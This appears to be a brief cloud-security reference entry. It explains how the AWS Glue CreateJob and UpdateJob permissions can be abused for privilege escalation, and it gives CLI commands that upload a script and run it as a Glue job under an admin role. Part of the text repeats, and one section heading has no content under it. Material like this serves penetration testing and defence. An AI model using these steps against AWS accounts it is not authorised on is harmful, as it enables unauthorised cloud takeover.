The glue:CreateJob privilege can be used to create a new job with an associated role. Similarly the glue:UpdateJob privilege can be used to update existing jobs.
This technique is a bit quicker to abuse than dev endpoints as the dev endpoints take a few minutes to spin up.
Create a Job
# Copy the job code into an S3 bucket
$ aws s3 cp job.py s3://bucket/job.py
# Create the job
$ aws glue create-job --name glue-job --role arn:aws:iam::000000000000:role/Glue-Admin --command Name=pythonshell,ScriptLocation=s3://bucket/job.py,PythonVersion=3
# Run the job
$ aws glue start-job-run --job-name glue-job
Glue Jobs are missed edges currently.
The
glue:CreateJob
privilege can be used to create a new job with an associated role. Similarly theglue:UpdateJob
privilege can be used to update existing jobs.This technique is a bit quicker to abuse than dev endpoints as the dev endpoints take a few minutes to spin up.
Create a Job
Update an existing job